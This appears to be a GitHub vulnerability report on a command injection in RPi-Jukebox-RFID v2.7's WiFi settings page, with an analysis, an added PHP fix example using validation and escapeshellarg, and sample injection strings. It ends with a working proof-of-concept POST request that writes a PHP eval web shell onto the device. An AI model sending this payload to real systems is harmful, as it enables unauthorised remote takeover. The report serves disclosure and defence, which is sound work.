Version
v2.7.0
Branch
released
OS
ubuntu 22
Pi model
unknown
Hardware
No response
What happened?
Hello,
I would like to report an RCE vulnerability in RPi-Jukebox-RFID v2.7 (no permissions required).
Analysis
The path of the vulnerability: htdocs/inc.setWifi.php
Source from Line 14 ($_POST). Then there is a check point (Line 8), which we bypass by setting $_POST['submitWifi'] = submit. Finally, the sink point executes a complex concatenated command (Line 38).
Let's briefly analyze this splicing command:
We have three controllable variables ($temp_ssid, $temp_pass, $temp_prio), but they need to meet the corresponding checks (Line 20, Line 22, Line 25 and Line 28). It can be seen that the condition we need to meet is to use KEY values with the prefixes WIFIssid_, WIFIpass_, and WIFIprio_, and strlen($temp_pass) >= 8.
In addition, since we are using bash -e mode, we must ensure that all commands before the controllable points can be executed correctly. That is, we need to find the correct value for $conf['scripts_abs'], which can be found in htdocs/settings.php:
#htdocs/settings.php
include("inc.header.php"); // Line 3 (init $conf['scripts_abs'])
...
include("inc.setWifi.php"); // Line 191
So we need to POST to htdocs/settings.php.
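The root cause described above is that request values are spliced into a shell command string, so a value containing shell metacharacters (such as the || used in the PoC) is interpreted by bash rather than passed as data. The following is an added illustration of how the same WIFIssid_/WIFIpass_/WIFIprio_ parameters can be handled safely; it is not code from RPi-Jukebox-RFID. The script name wifi_settings.sh, the argument order, the scripts path and the SSID/priority limits are assumptions made for the example; only the key prefixes and the 8-character password minimum come from the report.

```php
<?php
// Added example, not RPi-Jukebox-RFID's own code. Demonstrates two layers of
// defence against the injection described in this report:
//   1. strict validation of each WIFI* field before it is used anywhere,
//   2. escapeshellarg() on every argument so the shell sees one literal word.
declare(strict_types=1);

// Group WIFIssid_<n> / WIFIpass_<n> / WIFIprio_<n> fields by their numeric
// suffix. Keys that do not match this exact shape are ignored, and array
// values (PHP builds those for keys like "a[]") are skipped.
function collect_wifi_entries(array $post): array
{
    $entries = [];
    foreach ($post as $key => $value) {
        if (!is_string($value)) {
            continue;
        }
        if (preg_match('/^WIFI(ssid|pass|prio)_(\d{1,6})$/', (string) $key, $m)) {
            $entries[$m[2]][$m[1]] = $value;
        }
    }
    return $entries;
}

// Reject anything a WPA network entry cannot legitimately contain.
// Returns [ssid, pass, prio] on success, null otherwise.
function validate_wifi_entry(array $entry): ?array
{
    $ssid = $entry['ssid'] ?? '';
    $pass = $entry['pass'] ?? '';
    $prio = $entry['prio'] ?? '';
    // SSID: 1-32 bytes, no control characters (assumed limit for the example).
    if ($ssid === '' || strlen($ssid) > 32 || preg_match('/[\x00-\x1f\x7f]/', $ssid)) {
        return null;
    }
    // WPA2-PSK passphrase: 8-63 printable ASCII characters.
    if (!preg_match('/^[\x20-\x7e]{8,63}$/', $pass)) {
        return null;
    }
    // Priority: a small non-negative integer and nothing else.
    if (!preg_match('/^\d{1,3}$/', $prio)) {
        return null;
    }
    return [$ssid, $pass, (int) $prio];
}

// Build the command with every argument individually quoted. An SSID may
// legally contain spaces or quotes, so validation alone is not enough;
// escapeshellarg() turns each value into a single-quoted literal.
function build_wifi_command(string $scriptsAbs, string $ssid, string $pass, int $prio): string
{
    $script = rtrim($scriptsAbs, '/') . '/wifi_settings.sh'; // assumed script name
    $args = [$script, $ssid, $pass, (string) $prio];
    return implode(' ', array_map('escapeshellarg', $args));
}

// Constructed sample input: one clean entry, one whose SSID carries shell
// metacharacters (it passes validation but is neutralised by quoting), and
// one whose priority field is malformed and is rejected outright.
$samplePost = [
    'submitWifi' => 'submit',
    'WIFIssid_1' => 'HomeNet',
    'WIFIpass_1' => 'correct horse battery',
    'WIFIprio_1' => '1',
    'WIFIssid_2' => 'x || id > /tmp/out',
    'WIFIpass_2' => 'password!',
    'WIFIprio_2' => '5',
    'WIFIssid_3' => 'Guest',
    'WIFIpass_3' => 'guestguest',
    'WIFIprio_3' => '5; reboot',
];

$scriptsAbs = '/path/to/scripts'; // placeholder for $conf['scripts_abs']
foreach (collect_wifi_entries($samplePost) as $idx => $entry) {
    $valid = validate_wifi_entry($entry);
    if ($valid === null) {
        echo "entry $idx rejected\n";
        continue;
    }
    [$ssid, $pass, $prio] = $valid;
    echo build_wifi_command($scriptsAbs, $ssid, $pass, $prio), "\n";
}
```

Running this with the constructed input prints entry 1 and entry 2 as fully single-quoted argument lists (the || in entry 2's SSID arrives at the script as part of one argument, not as a shell operator) and reports entry 3 as rejected. The same two steps, allow-list validation and per-argument quoting, are what a fix for the sink at Line 38 needs; relying on bash -e or on the order of preceding commands does not prevent the injection.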
Poc
POST /htdocs/settings.php
Data:
submitWifi=submit&WIFIssid_123=+%7c%7c+echo+%22%3c%3fphp+%40eval(%5c%5c%5c%24_POST%5b%5c%22shell6%5c%22%5d)%3b+%3f%3e%22+%3e+.%2fshell6.php+&WIFIpass_123=%7c%7c+echo+%221%22+%7c%7c+&WIFIprio_123=1
Here is the version without url encoding for ease of understanding:
submitWifi=submit&WIFIssid_123= || echo "<?php @eval(\\\$_POST[\"shell6\"]); ?>" > ./shell6.php &WIFIpass_123=|| echo "1" || &WIFIprio_123=1
The concatenated command:
Manual verification
Logs
No response
Configuration
No response
More info
No response